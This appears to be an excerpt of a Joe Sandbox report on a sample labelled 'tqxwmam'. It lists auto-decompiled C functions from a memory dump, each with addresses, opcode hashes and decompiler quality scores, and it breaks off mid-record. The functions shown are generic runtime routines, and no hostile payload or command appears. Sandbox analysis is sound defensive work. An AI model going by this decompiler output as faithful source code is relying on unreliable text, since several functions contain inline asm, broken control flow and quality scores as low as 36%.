                                                    • Instruction ID: e689dee75a57d02508e4d74bc528110cf371e4de9d81f81ef1d060bb863707d2
                                                    • Opcode Fuzzy Hash: 41efdb4e10eef6c1169c77534f0c195d00b159a52263005a892bab24e7a0876a
                                                    • Instruction Fuzzy Hash: 3CF09070A046089FC704EBA9D546B6E77F4EF04300F1080A9F915EB2D1EA34D9008B54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AC927A Relevance: .0, Instructions: 32COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 54%
                                                    			E00AC927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L00AA4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E00ACFA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E00AC92C6(_t11, _t14);
				}
				return _t11;
			}





                                                    0x00ac9295
                                                    0x00ac9299
                                                    0x00ac929f
                                                    0x00ac92aa
                                                    0x00ac92ad
                                                    0x00ac92ae
                                                    0x00ac92af
                                                    0x00ac92b0
                                                    0x00ac92b4
                                                    0x00ac92bb
                                                    0x00ac92bb
                                                    0x00ac92c5

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                    • Instruction ID: d892ec419a20441a25d83c475edb76bd7f06c3b8892632dfc2d064a2ea358be5
                                                    • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                    • Instruction Fuzzy Hash: 75E0ED322406006BE7219F0ACC85F43B6A9AF82720F01407CB9041F283CAE6DC0887A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B58CD6 Relevance: .0, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 36%
                                                    			E00B58CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0xb7d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E00AA7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E00ACB640(E00AC9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                    0x00b58ce5
                                                    0x00b58ced
                                                    0x00b58cf0
                                                    0x00b58cfb
                                                    0x00b58d0d
                                                    0x00b58cfd
                                                    0x00b58d06
                                                    0x00b58d06
                                                    0x00b58d18
                                                    0x00b58d19
                                                    0x00b58d1b
                                                    0x00b58d20
                                                    0x00b58d33

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 734c90a193ba3bbf3e5a20c8239eecfe8a24fbb6c1e96e6b689e449b2669af4e
                                                    • Instruction ID: bad85cfe3e89883d18481fd504c29a06fe99f848f2e5402e49a2f42b3fcd0f82
                                                    • Opcode Fuzzy Hash: 734c90a193ba3bbf3e5a20c8239eecfe8a24fbb6c1e96e6b689e449b2669af4e
                                                    • Instruction Fuzzy Hash: 5BF08270A04208ABCB04DBA9D946EAE77F8EF09300F1101ADF916EB2D1EE34D904CB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AA746D Relevance: .0, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 88%
                                                    			E00AA746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E00A9EB70(__ecx, 0xb779a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E00AC95D0();
							L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                                                    0x00aa746d
                                                    0x00aa746d
                                                    0x00aa746d
                                                    0x00aa7471
                                                    0x00aa7488
                                                    0x00aef92d
                                                    0x00aa748e
                                                    0x00aa7491
                                                    0x00aa7495
                                                    0x00aef937
                                                    0x00aef93a
                                                    0x00aef94e
                                                    0x00aef953
                                                    0x00aef956
                                                    0x00aef956
                                                    0x00aa7495
                                                    0x00000000
                                                    0x00aa7488
                                                    0x00aa7473
                                                    0x00aa7478
                                                    0x00aa747d
                                                    0x00aa7481
                                                    0x00000000
                                                    0x00aa7481
                                                    0x00aa747d
                                                    0x00aa747a
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1fd1449dafb1acf56c65e4f3bcdbcdeeb9926ccdf308f1ed423b91a75a621825
                                                    • Instruction ID: f018c3800159c86ae3b23f3f12f58c1e998b1f011a848b42d87ff597ba2c3bde
                                                    • Opcode Fuzzy Hash: 1fd1449dafb1acf56c65e4f3bcdbcdeeb9926ccdf308f1ed423b91a75a621825
                                                    • Instruction Fuzzy Hash: 1DF0BE34A0D284EBDF019B68CD40B7FBBB1AF0A310F144265E8A1AB1E2E7259C00C785
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00A84F2E Relevance: .0, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00A84F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E00B588F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E00AAC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0xa61030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                                                    0x00a84f2e
                                                    0x00a84f34
                                                    0x00a84f38
                                                    0x00ae0b85
                                                    0x00ae0b85
                                                    0x00ae0b89
                                                    0x00ae0b9a
                                                    0x00ae0b9a
                                                    0x00ae0b9f
                                                    0x00000000
                                                    0x00ae0b9f
                                                    0x00ae0b94
                                                    0x00ae0b98
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ae0b98
                                                    0x00a84f3e
                                                    0x00a84f48
                                                    0x00000000
                                                    0x00a84f6e
                                                    0x00000000
                                                    0x00a84f70

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a179f5d94b0800013a1e333ed6197083f753cdfe16b706c1cabc876ed32f6682
                                                    • Instruction ID: 72be06bcf45c1fb3049a0ec35bd010e1b6c5969fc3777078d79c9a8f0fc33bb5
                                                    • Opcode Fuzzy Hash: a179f5d94b0800013a1e333ed6197083f753cdfe16b706c1cabc876ed32f6682
                                                    • Instruction Fuzzy Hash: 55F0E2329256C58FD771D719C180F23B7E4FB04778F4544A5E40587921C7B4ECC4C650
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B58B58 Relevance: .0, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 36%
                                                    			E00B58B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0xb7d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E00AA7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E00ACB640(E00AC9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                    0x00b58b67
                                                    0x00b58b6f
                                                    0x00b58b72
                                                    0x00b58b7d
                                                    0x00b58b8f
                                                    0x00b58b7f
                                                    0x00b58b88
                                                    0x00b58b88
                                                    0x00b58b9a
                                                    0x00b58b9b
                                                    0x00b58b9d
                                                    0x00b58ba2
                                                    0x00b58bb5

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 51fa73f954d0c7734fb54a64de78b4849d5742abd71e7c706a4bf3a101b5f7a0
                                                    • Instruction ID: 46b52b617c92da1ee3abd881e0db0e88596b1105740a2b502a5db7dc8db4612c
                                                    • Opcode Fuzzy Hash: 51fa73f954d0c7734fb54a64de78b4849d5742abd71e7c706a4bf3a101b5f7a0
                                                    • Instruction Fuzzy Hash: 5EF082B0A14258ABDB00EBA8DA06F6F73B8EF04300F150499B905EB3D1EF35D900CB99
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ABA44B Relevance: .0, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00ABA44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0xb77b9c; // 0x0
				_t15 = __ecx;
				_t16 = L00AA4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E00ACFA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                                                    0x00aba44b
                                                    0x00aba453
                                                    0x00aba472
                                                    0x00aba476
                                                    0x00000000
                                                    0x00aba493
                                                    0x00aba47a
                                                    0x00aba47f
                                                    0x00aba486
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ef78e9f53c54d79e2126a31e553f6dc449db6a9507703cd43ff36f8495c543b7
                                                    • Instruction ID: effebdcea66035cc950b529a350a10c71eec8273e6f702f57bdb555e82ebf266
                                                    • Opcode Fuzzy Hash: ef78e9f53c54d79e2126a31e553f6dc449db6a9507703cd43ff36f8495c543b7
                                                    • Instruction Fuzzy Hash: EEE09272A41421AFD2115B18AC01FA6B3ADDBE5751F1A8039F508C7251DA68DD01C7E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00A8F358 Relevance: .0, Instructions: 28COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 79%
                                                    			E00A8F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E00ABF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L00AA4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                                    0x00a8f35d
                                                    0x00a8f361
                                                    0x00a8f367
                                                    0x00a8f372
                                                    0x00a8f38c
                                                    0x00a8f38c
                                                    0x00a8f394

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                    • Instruction ID: 5ac13292365c50365d15cc12465d39ce564d128a9ea88fd0806f734b66ba9e9b
                                                    • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                    • Instruction Fuzzy Hash: 5DE0D832A41118BFCB21A6D99E06F9ABBACDB48B60F040165B904DB151D5609D10C3D0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00A9FF60 Relevance: .0, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00A9FF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0xa611a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E00B588F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E00AA0050(_t14);
				}
			}










                                                    0x00a9ff66
                                                    0x00a9ff6b
                                                    0x00000000
                                                    0x00a9ff8f
                                                    0x00000000
                                                    0x00a9ff8f

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ef5e2ca74055b054807e2b2ca72a6fe3ac47c4c822fa8e126c64da3ee9e85c96
                                                    • Instruction ID: eff603d31a4c4b1cfc0a8149105920f43609771d94ffa6c50bd4895453f080d3
                                                    • Opcode Fuzzy Hash: ef5e2ca74055b054807e2b2ca72a6fe3ac47c4c822fa8e126c64da3ee9e85c96
                                                    • Instruction Fuzzy Hash: F4E0DFB03052449FDF34DB51D180F253BE8DB52721F29806DF40ACB202CB21ECC0C206
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B141E8 Relevance: .0, Instructions: 21COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 82%
                                                    			E00B141E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0xb608f0);
				_t5 = E00ADD08C(__ebx, __edi, __esi);
				if( *0xb787ec == 0) {
					E00A9EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0xb787ec == 0) {
						 *0xb787f0 = 0xb787ec;
						 *0xb787ec = 0xb787ec;
						 *0xb787e8 = 0xb787e4;
						 *0xb787e4 = 0xb787e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L00B14248();
				}
				return E00ADD0D1(_t5);
			}





                                                    0x00b141e8
                                                    0x00b141ea
                                                    0x00b141ef
                                                    0x00b141fb
                                                    0x00b14206
                                                    0x00b1420b
                                                    0x00b14216
                                                    0x00b1421d
                                                    0x00b14222
                                                    0x00b1422c
                                                    0x00b14231
                                                    0x00b14231
                                                    0x00b14236
                                                    0x00b1423d
                                                    0x00b1423d
                                                    0x00b14247

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 73f571572002a5bc7823bda8ff35c783d7ba037e28c7fc18030174a6a91a1b0d
                                                    • Instruction ID: 9506e92f06457a44e6bea5a25c5d1240da628beae088b70bc7cb523f20c8c19d
                                                    • Opcode Fuzzy Hash: 73f571572002a5bc7823bda8ff35c783d7ba037e28c7fc18030174a6a91a1b0d
                                                    • Instruction Fuzzy Hash: D9F015759A0700DECBA8EFA99A0A74437E4F784321F6085AAA01A876A5CF744DC1CF02
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B3D380 Relevance: .0, Instructions: 21COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00B3D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L00A8E8B0(__ecx, _a4, 0xfff);
					L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                                    0x00b3d38a
                                                    0x00b3d39b
                                                    0x00b3d3b1
                                                    0x00000000
                                                    0x00b3d3b6
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                    • Instruction ID: 697f05a90e7fd6a46b0132aa994c99da20a1f3fb3a806bc37a5178983f17c4b1
                                                    • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                    • Instruction Fuzzy Hash: 1CE0C231284204FBDB226E44DD01F797B56DB507A0F204031FE086B691CA719C91E6C9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ABA185 Relevance: .0, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00ABA185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0xb767e4 >= 0xa) {
					if(_t5 < 0xb76800 || _t5 >= 0xb76900) {
						return L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E00AA0010(0xb767e0, _t5);
				}
			}





                                                    0x00aba190
                                                    0x00aba1a6
                                                    0x00aba1c2
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00aba192
                                                    0x00aba192
                                                    0x00aba19f
                                                    0x00aba19f

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b581db16a95276701898ee49d65e182b1559eb20821c6d10d3ee362473e3eb75
                                                    • Instruction ID: 21017462181cc5e956b63faba6c3bdca2cf9108ec7f4ceeca3a475d0977db25d
                                                    • Opcode Fuzzy Hash: b581db16a95276701898ee49d65e182b1559eb20821c6d10d3ee362473e3eb75
                                                    • Instruction Fuzzy Hash: 52D02E331608002ACB2C2319AE55B26239AE7A4700F3089ADF22F0B9E2DE708CD4C10B
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AB16E0 Relevance: .0, Instructions: 17COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00AB16E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E00AB1710(0xb767e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L00AA4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                                                    0x00ab16e8
                                                    0x00ab16ef
                                                    0x00ab16f3
                                                    0x00ab16fe
                                                    0x00000000
                                                    0x00ab1700
                                                    0x00ab170d
                                                    0x00ab170d
                                                    0x00ab16f2
                                                    0x00ab16f2
                                                    0x00ab16f2
                                                    0x00ab16f2

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a076e3eb8a63448603867498a4dcd58f3415f415621a0e5a42e2ca494c781fd6
                                                    • Instruction ID: bb8b94fd56eeb7519f9b6a95585d6934cac5e201ab398551f00c84ff3d5f1405
                                                    • Opcode Fuzzy Hash: a076e3eb8a63448603867498a4dcd58f3415f415621a0e5a42e2ca494c781fd6
                                                    • Instruction Fuzzy Hash: 85D0A73110010096DA2D5B109935B542359DBC0785F78046CF10B4A4C3DFA0CDA2E488
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B053CA Relevance: .0, Instructions: 16COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00B053CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E00A9EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                                                    0x00b053ca
                                                    0x00b053ce
                                                    0x00b053d9
                                                    0x00b053de
                                                    0x00b053e1
                                                    0x00b053e1
                                                    0x00b053e6
                                                    0x00b053f3
                                                    0x00000000
                                                    0x00b053f8
                                                    0x00b053fb

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                    • Instruction ID: 62049598b1ebb30e229581a6a4e251bca0b3f8ed5f0fe65730b28962f1edc1c6
                                                    • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                    • Instruction Fuzzy Hash: 10E0EC71A44B849BCF22DB59CA50F5EBBF5FB45B40F150454B4095BAA2C665AD00CB40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AB35A1 Relevance: .0, Instructions: 12COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00AB35A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E00A9EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                                                    0x00ab35a1
                                                    0x00ab35a1
                                                    0x00ab35a5
                                                    0x00ab35ab
                                                    0x00ab35ab
                                                    0x00ab35b5
                                                    0x00000000
                                                    0x00ab35c1
                                                    0x00ab35b7

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                    • Instruction ID: 37bae0c171422ac7b7fcb1d8ae2ba5109e1402fde73e0b2e124ac208502a3f31
                                                    • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                    • Instruction Fuzzy Hash: AED0C937651184DEDF61EF50C2187E877BABB00318F682265944646953E33B4F5AD601
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00A9AAB0 Relevance: .0, Instructions: 12COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00A9AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                                    0x00a9aab6
                                                    0x00a9aabb
                                                    0x00aea442
                                                    0x00000000
                                                    0x00aea448
                                                    0x00aea454
                                                    0x00aea454
                                                    0x00a9aac1
                                                    0x00a9aac1
                                                    0x00a9aac6
                                                    0x00a9aac6

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                    • Instruction ID: c4df0505d872431ca2758ca032626f0cc710c57b3bc1f5da17bb1adc38ab0fcf
                                                    • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                    • Instruction Fuzzy Hash: 3BD0E935352980CFD716DB1DC554B1573F4BB54B84FC50490E501CBB61E66CED44CA01
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B0A537 Relevance: .0, Instructions: 11COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00B0A537(intOrPtr _a4, intOrPtr _a8) {

				return L00AA8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                                                    0x00b0a553

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                    • Instruction ID: 58427f32320c8d0f099948c161c60ca38731ebe17d32ca4d11c5091049cdfa58
